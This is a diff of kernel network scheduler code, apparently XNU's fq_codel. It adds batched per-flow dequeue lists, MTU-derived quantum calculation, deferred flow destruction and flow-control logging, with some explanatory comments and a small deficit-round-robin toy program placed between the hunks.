+    int64_t byte_limit, u_int32_t pkt_limit, classq_pkt_t *head,
+    classq_pkt_t *tail, u_int32_t *byte_cnt, u_int32_t *pkt_cnt,
     boolean_t *qempty, u_int32_t pflags)
 {
        u_int32_t plen;
@@ -95,15 +123,15 @@ fq_getq_flow_mbuf(fq_if_t *fqs, fq_if_classq_t *fq_cl, fq_t *fq,
                fq->fq_deficit -= plen;
                pkt.pktsched_pkt_mbuf->m_pkthdr.pkt_flags |= pflags;
 
-               if (top->cp_mbuf == NULL) {
-                       *top = pkt.pktsched_pkt;
+               if (head->cp_mbuf == NULL) {
+                       *head = pkt.pktsched_pkt;
                } else {
-                       ASSERT(last->cp_mbuf != NULL);
-                       ASSERT(last->cp_mbuf->m_nextpkt == NULL);
-                       last->cp_mbuf->m_nextpkt = pkt.pktsched_pkt_mbuf;
+                       ASSERT(tail->cp_mbuf != NULL);
+                       ASSERT(tail->cp_mbuf->m_nextpkt == NULL);
+                       tail->cp_mbuf->m_nextpkt = pkt.pktsched_pkt_mbuf;
                }
-               *last = pkt.pktsched_pkt;
-               last->cp_mbuf->m_nextpkt = NULL;
+               *tail = pkt.pktsched_pkt;
+               tail->cp_mbuf->m_nextpkt = NULL;
                fq_cl->fcl_stat.fcl_dequeue++;
                fq_cl->fcl_stat.fcl_dequeue_bytes += plen;
                *pkt_cnt += 1;
@@ -321,6 +349,11 @@ fq_if_enqueue_classq(struct ifclassq *ifq, classq_pkt_t *head,
        IFCQ_INC_BYTES(ifq, bytes);
        IFCQ_UNLOCK(ifq);
 done:
+#if DEBUG || DEVELOPMENT
+       if (__improbable((ret == EQFULL) && (ifclassq_flow_control_adv == 0))) {
+               ret = 0;
+       }
+#endif /* DEBUG || DEVELOPMENT */
        return ret;
 }
 
@@ -344,22 +377,80 @@ fq_if_dequeue_sc_classq(struct ifclassq *ifq, mbuf_svc_class_t svc,
        fq_cl = &fqs->fqs_classq[pri];
 
        fq_if_dequeue(fqs, fq_cl, 1, CLASSQ_DEQUEUE_MAX_BYTE_LIMIT,
-           pkt, NULL, &total_pktcnt, &total_bytecnt, TRUE);
+           pkt, NULL, &total_pktcnt, &total_bytecnt, NULL, TRUE);
 
        IFCQ_XMIT_ADD(ifq, total_pktcnt, total_bytecnt);
 }
 
+static inline void
+fq_dqlist_add(flowq_dqlist_t *fq_dqlist_head, fq_t *fq)
+{
+       ASSERT(fq->fq_dq_head.cp_mbuf == NULL);
+       ASSERT(!fq->fq_in_dqlist);
+       STAILQ_INSERT_TAIL(fq_dqlist_head, fq, fq_dqlink);
+       fq->fq_in_dqlist = true;
+}
+
+static inline void
+fq_dqlist_remove(flowq_dqlist_t *fq_dqlist_head, fq_t *fq, classq_pkt_t *head,
+    classq_pkt_t *tail)
+{
+       ASSERT(fq->fq_in_dqlist);
+       if (fq->fq_dq_head.cp_mbuf == NULL) {
+               goto done;
+       }
+
+       if (head->cp_mbuf == NULL) {
+               *head = fq->fq_dq_head;
+       } else {
+               ASSERT(tail->cp_mbuf != NULL);
+
+               switch (fq->fq_ptype) {
+               case QP_MBUF:
+                       ASSERT(tail->cp_mbuf->m_nextpkt == NULL);
+                       tail->cp_mbuf->m_nextpkt = fq->fq_dq_head.cp_mbuf;
+                       ASSERT(fq->fq_dq_tail.cp_mbuf->m_nextpkt == NULL);
+                       break;
+               default:
+                       VERIFY(0);
+                       /* NOTREACHED */
+                       __builtin_unreachable();
+               }
+       }
+       *tail = fq->fq_dq_tail;
+done:
+       STAILQ_REMOVE(fq_dqlist_head, fq, flowq, fq_dqlink);
+       CLASSQ_PKT_INIT(&fq->fq_dq_head);
+       CLASSQ_PKT_INIT(&fq->fq_dq_tail);
+       fq->fq_in_dqlist = false;
+       if (fq->fq_flags & FQF_DESTROYED) {
+               fq_destroy(fq);
+       }
+}
+
+static inline void
+fq_dqlist_get_packet_list(flowq_dqlist_t *fq_dqlist_head, classq_pkt_t *head,
+    classq_pkt_t *tail)
+{
+       fq_t *fq, *tfq;
+
+       STAILQ_FOREACH_SAFE(fq, fq_dqlist_head, fq_dqlink, tfq) {
+               fq_dqlist_remove(fq_dqlist_head, fq, head, tail);
+       }
+}
+
 int
 fq_if_dequeue_classq_multi(struct ifclassq *ifq, u_int32_t maxpktcnt,
     u_int32_t maxbytecnt, classq_pkt_t *first_packet,
     classq_pkt_t *last_packet, u_int32_t *retpktcnt,
     u_int32_t *retbytecnt)
 {
-       u_int32_t pktcnt = 0, bytecnt = 0, total_pktcnt = 0, total_bytecnt = 0;
+       uint32_t total_pktcnt = 0, total_bytecnt = 0;
        classq_pkt_t first = CLASSQ_PKT_INITIALIZER(first);
        classq_pkt_t last = CLASSQ_PKT_INITIALIZER(last);
        classq_pkt_t tmp = CLASSQ_PKT_INITIALIZER(tmp);
        fq_if_append_pkt_t append_pkt;
+       flowq_dqlist_t fq_dqlist_head;
        fq_if_classq_t *fq_cl;
        fq_if_t *fqs;
        int pri;
@@ -367,6 +458,7 @@ fq_if_dequeue_classq_multi(struct ifclassq *ifq, u_int32_t maxpktcnt,
        IFCQ_LOCK_ASSERT_HELD(ifq);
 
        fqs = (fq_if_t *)ifq->ifcq_disc;
+       STAILQ_INIT(&fq_dqlist_head);
 
        switch (fqs->fqs_ptype) {
        case QP_MBUF:
@@ -381,7 +473,8 @@ fq_if_dequeue_classq_multi(struct ifclassq *ifq, u_int32_t maxpktcnt,
        }
 
        for (;;) {
-               classq_pkt_t top = CLASSQ_PKT_INITIALIZER(top);
+               uint32_t pktcnt = 0, bytecnt = 0;
+               classq_pkt_t head = CLASSQ_PKT_INITIALIZER(head);
                classq_pkt_t tail = CLASSQ_PKT_INITIALIZER(tail);
 
                if (fqs->fqs_bitmaps[FQ_IF_ER] == 0 &&
@@ -419,26 +512,22 @@ fq_if_dequeue_classq_multi(struct ifclassq *ifq, u_int32_t maxpktcnt,
                        }
                }
                fq_if_dequeue(fqs, fq_cl, (maxpktcnt - total_pktcnt),
-                   (maxbytecnt - total_bytecnt), &top, &tail, &pktcnt,
-                   &bytecnt, FALSE);
-               if (top.cp_mbuf != NULL) {
-                       ASSERT(pktcnt > 0 && bytecnt > 0);
+                   (maxbytecnt - total_bytecnt), &head, &tail, &pktcnt,
+                   &bytecnt, &fq_dqlist_head, FALSE);
+               if (head.cp_mbuf != NULL) {
+                       ASSERT(STAILQ_EMPTY(&fq_dqlist_head));
                        if (first.cp_mbuf == NULL) {
-                               first = top;
-                               total_pktcnt = pktcnt;
-                               total_bytecnt = bytecnt;
+                               first = head;
                        } else {
                                ASSERT(last.cp_mbuf != NULL);
-                               append_pkt(&last, &top);
-                               total_pktcnt += pktcnt;
-                               total_bytecnt += bytecnt;
+                               append_pkt(&last, &head);
                        }
                        last = tail;
                        append_pkt(&last, &tmp);
-                       fq_cl->fcl_budget -= bytecnt;
-                       pktcnt = 0;
-                       bytecnt = 0;
                }
+               fq_cl->fcl_budget -= bytecnt;
+               total_pktcnt += pktcnt;
+               total_bytecnt += bytecnt;
 
                /*
                 * If the class has exceeded the budget but still has data
@@ -464,6 +553,8 @@ state_change:
                }
        }
 
+       fq_dqlist_get_packet_list(&fq_dqlist_head, &first, &last);
+
        if (__probable(first_packet != NULL)) {
                *first_packet = first;
        }
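
For context, the fcl_quantum / fcl_budget pair this loop maintains implements a deficit-round-robin split between the service classes: each pass credits a class with its quantum and dequeues until the credit runs out, so a class with twice the quantum gets roughly twice the bytes per round. A userland toy of that idea (fixed 1500-byte packets, made-up quanta), not the kernel's actual accounting:

#include <stdio.h>

struct toy_class {
	const char *name;
	int quantum;      /* credit added per round (cf. fcl_quantum) */
	int budget;       /* running credit (cf. fcl_budget) */
	int queued_pkts;  /* every queued packet is 1500 bytes here */
};

int
main(void)
{
	struct toy_class classes[] = {
		{ "BE", 1514, 0, 12 },
		{ "VI", 3028, 0, 12 },  /* 2x quantum => ~2x the share */
	};

	for (int round = 0; round < 3; round++) {
		for (int i = 0; i < 2; i++) {
			struct toy_class *cl = &classes[i];
			int sent = 0;

			cl->budget += cl->quantum;
			while (cl->budget >= 1500 && cl->queued_pkts > 0) {
				cl->budget -= 1500;
				cl->queued_pkts--;
				sent++;
			}
			printf("round %d: %s sent %d pkts, credit left %d\n",
			    round, cl->name, sent, cl->budget);
		}
	}
	return 0;
}
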
@@ -493,6 +584,7 @@ fq_if_dequeue_sc_classq_multi(struct ifclassq *ifq, mbuf_svc_class_t svc,
        classq_pkt_t first = CLASSQ_PKT_INITIALIZER(first);
        classq_pkt_t last = CLASSQ_PKT_INITIALIZER(last);
        fq_if_append_pkt_t append_pkt;
+       flowq_dqlist_t fq_dqlist_head;
 
        switch (fqs->fqs_ptype) {
        case QP_MBUF:
@@ -506,6 +598,7 @@ fq_if_dequeue_sc_classq_multi(struct ifclassq *ifq, mbuf_svc_class_t svc,
                __builtin_unreachable();
        }
 
+       STAILQ_INIT(&fq_dqlist_head);
        pri = fq_if_service_to_priority(fqs, svc);
        fq_cl = &fqs->fqs_classq[pri];
        /*
@@ -515,28 +608,28 @@ fq_if_dequeue_sc_classq_multi(struct ifclassq *ifq, mbuf_svc_class_t svc,
         */
        while (total_pktcnt < maxpktcnt && total_bytecnt < maxbytecnt &&
            fq_cl->fcl_stat.fcl_pkt_cnt > 0) {
-               classq_pkt_t top = CLASSQ_PKT_INITIALIZER(top);
+               classq_pkt_t head = CLASSQ_PKT_INITIALIZER(head);
                classq_pkt_t tail = CLASSQ_PKT_INITIALIZER(tail);
                u_int32_t pktcnt = 0, bytecnt = 0;
 
                fq_if_dequeue(fqs, fq_cl, (maxpktcnt - total_pktcnt),
-                   (maxbytecnt - total_bytecnt), &top, &tail, &pktcnt,
-                   &bytecnt, TRUE);
-               if (top.cp_mbuf != NULL) {
+                   (maxbytecnt - total_bytecnt), &head, &tail, &pktcnt,
+                   &bytecnt, &fq_dqlist_head, TRUE);
+               if (head.cp_mbuf != NULL) {
                        if (first.cp_mbuf == NULL) {
-                               first = top;
-                               total_pktcnt = pktcnt;
-                               total_bytecnt = bytecnt;
+                               first = head;
                        } else {
                                ASSERT(last.cp_mbuf != NULL);
-                               append_pkt(&last, &top);
-                               total_pktcnt += pktcnt;
-                               total_bytecnt += bytecnt;
+                               append_pkt(&last, &head);
                        }
                        last = tail;
                }
+               total_pktcnt += pktcnt;
+               total_bytecnt += bytecnt;
        }
 
+       fq_dqlist_get_packet_list(&fq_dqlist_head, &first, &last);
+
        if (__probable(first_packet != NULL)) {
                *first_packet = first;
        }
@@ -581,10 +674,10 @@ fq_if_purge_flow(fq_if_t *fqs, fq_t *fq, u_int32_t *pktsp,
        if (fq->fq_flags & FQF_NEW_FLOW) {
                fq_if_empty_new_flow(fq, fq_cl, false);
        } else if (fq->fq_flags & FQF_OLD_FLOW) {
-               fq_if_empty_old_flow(fqs, fq_cl, fq, false);
+               fq_if_empty_old_flow(fqs, fq_cl, fq, false, true);
        }
 
-       fq_if_destroy_flow(fqs, fq_cl, fq);
+       fq_if_destroy_flow(fqs, fq_cl, fq, true);
 
        if (FQ_IF_CLASSQ_IDLE(fq_cl)) {
                int i;
@@ -663,6 +756,78 @@ fq_if_purge_sc(fq_if_t *fqs, cqrq_purge_sc_t *req)
        }
 }
 
+static uint16_t
+fq_if_calc_quantum(struct ifnet *ifp)
+{
+       uint16_t quantum;
+
+       switch (ifp->if_family) {
+       case IFNET_FAMILY_ETHERNET:
+               VERIFY((ifp->if_mtu + ETHER_HDR_LEN) <= UINT16_MAX);
+               quantum = (uint16_t)ifp->if_mtu + ETHER_HDR_LEN;
+               break;
+
+       case IFNET_FAMILY_CELLULAR:
+       case IFNET_FAMILY_IPSEC:
+       case IFNET_FAMILY_UTUN:
+               VERIFY(ifp->if_mtu <= UINT16_MAX);
+               quantum = (uint16_t)ifp->if_mtu;
+               break;
+
+       default:
+               quantum = FQ_CODEL_DEFAULT_QUANTUM;
+               break;
+       }
+
+       /*
+        * XXX: Skywalk native interface doesn't support HW TSO offload.
+        */
+       if (((ifp->if_eflags & IFEF_SKYWALK_NATIVE) == 0) &&
+           ((ifp->if_hwassist & IFNET_TSOF) != 0)) {
+               VERIFY(ifp->if_tso_v4_mtu <= UINT16_MAX);
+               VERIFY(ifp->if_tso_v6_mtu <= UINT16_MAX);
+               quantum = (uint16_t)MAX(ifp->if_tso_v4_mtu, ifp->if_tso_v6_mtu);
+               quantum = (quantum != 0) ? quantum : IF_MAXMTU;
+       }
+
+       quantum = MAX(FQ_CODEL_DEFAULT_QUANTUM, quantum);
+#if DEBUG || DEVELOPMENT
+       quantum = (fq_codel_quantum != 0) ? fq_codel_quantum : quantum;
+#endif /* DEBUG || DEVELOPMENT */
+       return quantum;
+}
+
+static void
+fq_if_mtu_update(fq_if_t *fqs)
+{
+#define _FQ_CLASSQ_UPDATE_QUANTUM(_fqs, _s, _q)    \
+       (_fqs)->fqs_classq[FQ_IF_ ## _s ## _INDEX].fcl_quantum = \
+       FQ_CODEL_QUANTUM_ ## _s(_q)
+
+       uint16_t quantum;
+
+       quantum = fq_if_calc_quantum(fqs->fqs_ifq->ifcq_ifp);
+
+       if ((fqs->fqs_flags & FQS_DRIVER_MANAGED) != 0) {
+               _FQ_CLASSQ_UPDATE_QUANTUM(fqs, BK, quantum);
+               _FQ_CLASSQ_UPDATE_QUANTUM(fqs, BE, quantum);
+               _FQ_CLASSQ_UPDATE_QUANTUM(fqs, VI, quantum);
+               _FQ_CLASSQ_UPDATE_QUANTUM(fqs, VO, quantum);
+       } else {
+               _FQ_CLASSQ_UPDATE_QUANTUM(fqs, BK_SYS, quantum);
+               _FQ_CLASSQ_UPDATE_QUANTUM(fqs, BK, quantum);
+               _FQ_CLASSQ_UPDATE_QUANTUM(fqs, BE, quantum);
+               _FQ_CLASSQ_UPDATE_QUANTUM(fqs, RD, quantum);
+               _FQ_CLASSQ_UPDATE_QUANTUM(fqs, OAM, quantum);
+               _FQ_CLASSQ_UPDATE_QUANTUM(fqs, AV, quantum);
+               _FQ_CLASSQ_UPDATE_QUANTUM(fqs, RV, quantum);
+               _FQ_CLASSQ_UPDATE_QUANTUM(fqs, VI, quantum);
+               _FQ_CLASSQ_UPDATE_QUANTUM(fqs, VO, quantum);
+               _FQ_CLASSQ_UPDATE_QUANTUM(fqs, CTL, quantum);
+       }
+#undef _FQ_CLASSQ_UPDATE_QUANTUM
+}
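/*
 * For reference, one expansion of the helper macro above:
 * _FQ_CLASSQ_UPDATE_QUANTUM(fqs, BK, quantum) becomes
 *
 *     (fqs)->fqs_classq[FQ_IF_BK_INDEX].fcl_quantum =
 *         FQ_CODEL_QUANTUM_BK(quantum);
 *
 * so each service class re-derives its quantum from the new link quantum
 * through its FQ_CODEL_QUANTUM_* macro (defined outside this excerpt)
 * whenever the MTU changes.
 */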
+
 static void
 fq_if_event(fq_if_t *fqs, cqev_t ev)
 {
@@ -673,6 +838,9 @@ fq_if_event(fq_if_t *fqs, cqev_t ev)
        case CLASSQ_EV_LINK_DOWN:
                fq_if_purge(fqs);
                break;
+       case CLASSQ_EV_LINK_MTU:
+               fq_if_mtu_update(fqs);
+               break;
        default:
                break;
        }
@@ -782,8 +950,14 @@ fq_if_setup_ifclassq(struct ifclassq *ifq, u_int32_t flags,
     classq_pkt_type_t ptype)
 {
 #pragma unused(flags)
+#define _FQ_CLASSQ_INIT(_fqs, _s, _q)                         \
+       fq_if_classq_init((_fqs), FQ_IF_ ## _s ## _INDEX,     \
+       FQ_CODEL_QUANTUM_ ## _s(_q), FQ_CODEL_DRR_MAX_ ## _s, \
+       MBUF_SC_ ## _s )
+
        struct ifnet *ifp = ifq->ifcq_ifp;
        fq_if_t *fqs = NULL;
+       uint16_t quantum;
        int err = 0;
 
        IFCQ_LOCK_ASSERT_HELD(ifq);
@@ -795,51 +969,39 @@ fq_if_setup_ifclassq(struct ifclassq *ifq, u_int32_t flags,
                return ENOMEM;
        }
 
+       quantum = fq_if_calc_quantum(ifp);
+
        if (flags & PKTSCHEDF_QALG_DRIVER_MANAGED) {
                fqs->fqs_flags |= FQS_DRIVER_MANAGED;
-               fq_if_classq_init(fqs, FQ_IF_BK_INDEX, 1500,
-                   2, MBUF_SC_BK);
-               fq_if_classq_init(fqs, FQ_IF_BE_INDEX, 1500,
-                   4, MBUF_SC_BE);
-               fq_if_classq_init(fqs, FQ_IF_VI_INDEX, 3000,
-                   6, MBUF_SC_VI);
-               fq_if_classq_init(fqs, FQ_IF_VO_INDEX, 600,
-                   8, MBUF_SC_VO);
+               _FQ_CLASSQ_INIT(fqs, BK, quantum);
+               _FQ_CLASSQ_INIT(fqs, BE, quantum);
+               _FQ_CLASSQ_INIT(fqs, VI, quantum);
+               _FQ_CLASSQ_INIT(fqs, VO, quantum);
        } else {
                /* SIG shares same INDEX with VI */
                _CASSERT(SCIDX_SIG == SCIDX_VI);
                _CASSERT(FQ_IF_SIG_INDEX == FQ_IF_VI_INDEX);
 
-               fq_if_classq_init(fqs, FQ_IF_BK_SYS_INDEX, 1500,
-                   2, MBUF_SC_BK_SYS);
-               fq_if_classq_init(fqs, FQ_IF_BK_INDEX, 1500,
-                   2, MBUF_SC_BK);
-               fq_if_classq_init(fqs, FQ_IF_BE_INDEX, 1500,
-                   4, MBUF_SC_BE);
-               fq_if_classq_init(fqs, FQ_IF_RD_INDEX, 1500,
-                   4, MBUF_SC_RD);
-               fq_if_classq_init(fqs, FQ_IF_OAM_INDEX, 1500,
-                   4, MBUF_SC_OAM);
-               fq_if_classq_init(fqs, FQ_IF_AV_INDEX, 3000,
-                   6, MBUF_SC_AV);
-               fq_if_classq_init(fqs, FQ_IF_RV_INDEX, 3000,
-                   6, MBUF_SC_RV);
-               fq_if_classq_init(fqs, FQ_IF_VI_INDEX, 3000,
-                   6, MBUF_SC_VI);
-               fq_if_classq_init(fqs, FQ_IF_VO_INDEX, 600,
-                   8, MBUF_SC_VO);
-               fq_if_classq_init(fqs, FQ_IF_CTL_INDEX, 600,
-                   8, MBUF_SC_CTL);
+               _FQ_CLASSQ_INIT(fqs, BK_SYS, quantum);
+               _FQ_CLASSQ_INIT(fqs, BK, quantum);
+               _FQ_CLASSQ_INIT(fqs, BE, quantum);
+               _FQ_CLASSQ_INIT(fqs, RD, quantum);
+               _FQ_CLASSQ_INIT(fqs, OAM, quantum);
+               _FQ_CLASSQ_INIT(fqs, AV, quantum);
+               _FQ_CLASSQ_INIT(fqs, RV, quantum);
+               _FQ_CLASSQ_INIT(fqs, VI, quantum);
+               _FQ_CLASSQ_INIT(fqs, VO, quantum);
+               _FQ_CLASSQ_INIT(fqs, CTL, quantum);
        }
 
        err = ifclassq_attach(ifq, PKTSCHEDT_FQ_CODEL, fqs);
-
        if (err != 0) {
-               printf("%s: error from ifclassq_attach, "
+               os_log_error(OS_LOG_DEFAULT, "%s: error from ifclassq_attach, "
                    "failed to attach fq_if: %d\n", __func__, err);
                fq_if_destroy(fqs);
        }
        return err;
+#undef _FQ_CLASSQ_INIT
 }
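/*
 * Likewise, the setup-path macro above expands as, for example,
 * _FQ_CLASSQ_INIT(fqs, BK, quantum) ->
 *
 *     fq_if_classq_init(fqs, FQ_IF_BK_INDEX,
 *         FQ_CODEL_QUANTUM_BK(quantum), FQ_CODEL_DRR_MAX_BK, MBUF_SC_BK);
 *
 * replacing the previous hard-coded per-class quanta (1500/3000/600 bytes)
 * with values derived from the interface quantum computed by
 * fq_if_calc_quantum().
 */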
 
 fq_t *
@@ -893,7 +1055,8 @@ fq_if_hash_pkt(fq_if_t *fqs, u_int32_t flowid, mbuf_svc_class_t svc_class,
 }
 
 void
-fq_if_destroy_flow(fq_if_t *fqs, fq_if_classq_t *fq_cl, fq_t *fq)
+fq_if_destroy_flow(fq_if_t *fqs, fq_if_classq_t *fq_cl, fq_t *fq,
+    bool destroy_now)
 {
        u_int8_t hash_id;
        hash_id = FQ_IF_FLOW_HASH_ID(fq->fq_flowhash);
@@ -901,7 +1064,10 @@ fq_if_destroy_flow(fq_if_t *fqs, fq_if_classq_t *fq_cl, fq_t *fq)
            fq_hashlink);
        fq_cl->fcl_stat.fcl_flows_cnt--;
        IFCQ_CONVERT_LOCK(fqs->fqs_ifq);
-       fq_destroy(fq);
+       fq->fq_flags |= FQF_DESTROYED;
+       if (destroy_now) {
+               fq_destroy(fq);
+       }
 }
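/*
 * Note on the new destroy_now parameter: when it is false the flow is only
 * unhashed and marked FQF_DESTROYED here; the assumption is that the final
 * fq_destroy() happens later, after the batched dequeue list has been
 * drained (see the fq_dqlist_get_packet_list() call in the dequeue path
 * earlier in this change).  Callers that are not batching pass true and the
 * flow is freed immediately, as before.
 */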
 
 inline boolean_t
@@ -913,7 +1079,7 @@ fq_if_at_drop_limit(fq_if_t *fqs)
 
 static void
 fq_if_empty_old_flow(fq_if_t *fqs, fq_if_classq_t *fq_cl, fq_t *fq,
-    bool remove_hash)
+    bool remove_hash, bool destroy)
 {
        /*
         * Remove the flow queue if it is empty
@@ -927,7 +1093,7 @@ fq_if_empty_old_flow(fq_if_t *fqs, fq_if_classq_t *fq_cl, fq_t *fq,
 
        if (remove_hash) {
                /* Remove from the hash list */
-               fq_if_destroy_flow(fqs, fq_cl, fq);
+               fq_if_destroy_flow(fqs, fq_cl, fq, destroy);
        }
 }
 
@@ -986,7 +1152,7 @@ fq_if_drop_packet(fq_if_t *fqs)
        if (fq_empty(fq)) {
                fqs->fqs_large_flow = NULL;
                if (fq->fq_flags & FQF_OLD_FLOW) {
-                       fq_if_empty_old_flow(fqs, fq_cl, fq, true);
+                       fq_if_empty_old_flow(fqs, fq_cl, fq, true, true);
                } else {
                        VERIFY(fq->fq_flags & FQF_NEW_FLOW);
                        fq_if_empty_new_flow(fq, fq_cl, true);
@@ -1024,14 +1190,21 @@ fq_if_is_flow_heavy(fq_if_t *fqs, fq_t *fq)
 }
 
 boolean_t
-fq_if_add_fcentry(fq_if_t *fqs, pktsched_pkt_t *pkt, uint32_t flowid,
-    uint8_t flowsrc, fq_if_classq_t *fq_cl)
+fq_if_add_fcentry(fq_if_t *fqs, pktsched_pkt_t *pkt, uint8_t flowsrc,
+    fq_t *fq, fq_if_classq_t *fq_cl)
 {
        struct flowadv_fcentry *fce;
 
+#if DEBUG || DEVELOPMENT
+       if (__improbable(ifclassq_flow_control_adv == 0)) {
+               os_log(OS_LOG_DEFAULT, "%s: skipped flow control", __func__);
+               return TRUE;
+       }
+#endif /* DEBUG || DEVELOPMENT */
+
        STAILQ_FOREACH(fce, &fqs->fqs_fclist, fce_link) {
                if ((uint8_t)fce->fce_flowsrc_type == flowsrc &&
-                   fce->fce_flowid == flowid) {
+                   fce->fce_flowid == fq->fq_flowhash) {
                        /* Already on flowcontrol list */
                        return TRUE;
                }
@@ -1042,6 +1215,11 @@ fq_if_add_fcentry(fq_if_t *fqs, pktsched_pkt_t *pkt, uint32_t flowid,
                /* XXX Add number of bytes in the queue */
                STAILQ_INSERT_TAIL(&fqs->fqs_fclist, fce, fce_link);
                fq_cl->fcl_stat.fcl_flow_control++;
+               os_log(OS_LOG_DEFAULT, "%s: num: %d, scidx: %d, flowsrc: %d, "
+                   "flow: 0x%x, iface: %s\n", __func__,
+                   fq_cl->fcl_stat.fcl_flow_control,
+                   fq->fq_sc_index, fce->fce_flowsrc_type, fq->fq_flowhash,
+                   if_name(fqs->fqs_ifq->ifcq_ifp));
        }
        return (fce != NULL) ? TRUE : FALSE;
 }
@@ -1061,23 +1239,30 @@ fq_if_flow_feedback(fq_if_t *fqs, fq_t *fq, fq_if_classq_t *fq_cl)
                STAILQ_REMOVE(&fqs->fqs_fclist, fce, flowadv_fcentry,
                    fce_link);
                STAILQ_NEXT(fce, fce_link) = NULL;
-               flowadv_add_entry(fce);
                fq_cl->fcl_stat.fcl_flow_feedback++;
+               os_log(OS_LOG_DEFAULT, "%s: num: %d, scidx: %d, flowsrc: %d, "
+                   "flow: 0x%x, iface: %s\n", __func__,
+                   fq_cl->fcl_stat.fcl_flow_feedback, fq->fq_sc_index,
+                   fce->fce_flowsrc_type, fce->fce_flowid,
+                   if_name(fqs->fqs_ifq->ifcq_ifp));
+               flowadv_add_entry(fce);
        }
        fq->fq_flags &= ~FQF_FLOWCTL_ON;
 }
 
 void
 fq_if_dequeue(fq_if_t *fqs, fq_if_classq_t *fq_cl, uint32_t pktlimit,
-    int64_t bytelimit, classq_pkt_t *top, classq_pkt_t *tail,
-    uint32_t *retpktcnt, uint32_t *retbytecnt, boolean_t drvmgmt)
+    int64_t bytelimit, classq_pkt_t *top, classq_pkt_t *bottom,
+    uint32_t *retpktcnt, uint32_t *retbytecnt, flowq_dqlist_t *fq_dqlist,
+    boolean_t drvmgmt)
 {
        fq_t *fq = NULL, *tfq = NULL;
        flowq_stailq_t temp_stailq;
-       u_int32_t pktcnt, bytecnt;
+       uint32_t pktcnt, bytecnt;
        boolean_t qempty, limit_reached = FALSE;
        classq_pkt_t last = CLASSQ_PKT_INITIALIZER(last);
        fq_getq_flow_t fq_getq_flow_fn;
+       classq_pkt_t *head, *tail;
 
        switch (fqs->fqs_ptype) {
        case QP_MBUF:
@@ -1107,8 +1292,20 @@ fq_if_dequeue(fq_if_t *fqs, fq_if_classq_t *fq_cl, uint32_t pktlimit,
                ASSERT((fq->fq_flags & (FQF_NEW_FLOW | FQF_OLD_FLOW)) ==
                    FQF_NEW_FLOW);
 
+               if (fq_dqlist != NULL) {
+                       if (!fq->fq_in_dqlist) {
+                               fq_dqlist_add(fq_dqlist, fq);
+                       }
+                       head = &fq->fq_dq_head;
+                       tail = &fq->fq_dq_tail;
+               } else {
+                       ASSERT(!fq->fq_in_dqlist);
+                       head = top;
+                       tail = &last;
+               }
+
                limit_reached = fq_getq_flow_fn(fqs, fq_cl, fq, bytelimit,
-                   pktlimit, top, &last, &bytecnt, &pktcnt, &qempty,
+                   pktlimit, head, tail, &bytecnt, &pktcnt, &qempty,
                    PKTF_NEW_FLOW);
 
                if (fq->fq_deficit <= 0 || qempty) {
@@ -1123,12 +1320,26 @@ fq_if_dequeue(fq_if_t *fqs, fq_if_classq_t *fq_cl, uint32_t pktlimit,
        STAILQ_FOREACH_SAFE(fq, &fq_cl->fcl_old_flows, fq_actlink, tfq) {
                VERIFY((fq->fq_flags & (FQF_NEW_FLOW | FQF_OLD_FLOW)) ==
                    FQF_OLD_FLOW);
+               bool destroy = true;
+
+               if (fq_dqlist != NULL) {
+                       if (!fq->fq_in_dqlist) {
+                               fq_dqlist_add(fq_dqlist, fq);
+                       }
+                       head = &fq->fq_dq_head;
+                       tail = &fq->fq_dq_tail;
+                       destroy = false;
+               } else {
+                       ASSERT(!fq->fq_in_dqlist);
+                       head = top;
+                       tail = &last;
+               }
 
                limit_reached = fq_getq_flow_fn(fqs, fq_cl, fq, bytelimit,
-                   pktlimit, top, &last, &bytecnt, &pktcnt, &qempty, 0);
+                   pktlimit, head, tail, &bytecnt, &pktcnt, &qempty, 0);
 
                if (qempty) {
-                       fq_if_empty_old_flow(fqs, fq_cl, fq, true);
+                       fq_if_empty_old_flow(fqs, fq_cl, fq, true, destroy);
                } else if (fq->fq_deficit <= 0) {
                        STAILQ_REMOVE(&fq_cl->fcl_old_flows, fq,
                            flowq, fq_actlink);
@@ -1151,19 +1362,18 @@ done:
        } else if (!STAILQ_EMPTY(&temp_stailq)) {
                fq_cl->fcl_old_flows = temp_stailq;
        }
-
        if (last.cp_mbuf != NULL) {
                VERIFY(top->cp_mbuf != NULL);
-               if (tail != NULL) {
-                       *tail = last;
-               }
-               if (retpktcnt != NULL) {
-                       *retpktcnt = pktcnt;
-               }
-               if (retbytecnt != NULL) {
-                       *retbytecnt = bytecnt;
+               if (bottom != NULL) {
+                       *bottom = last;
                }
        }
+       if (retpktcnt != NULL) {
+               *retpktcnt = pktcnt;
+       }
+       if (retbytecnt != NULL) {
+               *retbytecnt = bytecnt;
+       }
 }
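/*
 * Sketch of the batched-dequeue contract added above (descriptive only; the
 * dqlist setup itself is not shown in this change): when the caller passes
 * a non-NULL fq_dqlist, packets dequeued from each flow are parked on that
 * flow's own fq_dq_head/fq_dq_tail chain and the flow is registered on the
 * list via fq_dqlist_add(); *top and *bottom are left untouched.  The
 * caller later stitches everything into a single chain with
 * fq_dqlist_get_packet_list(&dqlist, &first, &last), as the multi-class
 * dequeue path earlier in this change does.  Without a dqlist the behavior
 * is unchanged: packets are chained directly onto *top and the tail comes
 * back through *bottom.
 */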
 
 void
index ce05193bce52fffb95aadcc89c729fbae91fd60c..4228b6e80b0350a680c52f9c26861d654847ae62 100644 (file)
@@ -212,8 +212,8 @@ extern struct flowq *fq_if_hash_pkt(fq_if_t *, u_int32_t, mbuf_svc_class_t,
 extern boolean_t fq_if_at_drop_limit(fq_if_t *);
 extern void fq_if_drop_packet(fq_if_t *);
 extern void fq_if_is_flow_heavy(fq_if_t *, struct flowq *);
-extern boolean_t fq_if_add_fcentry(fq_if_t *, pktsched_pkt_t *, uint32_t,
-    uint8_t, fq_if_classq_t *);
+extern boolean_t fq_if_add_fcentry(fq_if_t *, pktsched_pkt_t *, uint8_t,
+    struct flowq *, fq_if_classq_t *);
 extern void fq_if_flow_feedback(fq_if_t *, struct flowq *, fq_if_classq_t *);
 extern int fq_if_setup_ifclassq(struct ifclassq *ifq, u_int32_t flags,
     classq_pkt_type_t ptype);
@@ -221,7 +221,7 @@ extern void fq_if_teardown_ifclassq(struct ifclassq *ifq);
 extern int fq_if_getqstats_ifclassq(struct ifclassq *ifq, u_int32_t qid,
     struct if_ifclassq_stats *ifqs);
 extern void fq_if_destroy_flow(fq_if_t *, fq_if_classq_t *,
-    struct flowq *);
+    struct flowq *, bool);
 
 
 #endif /* BSD_KERNEL_PRIVATE */
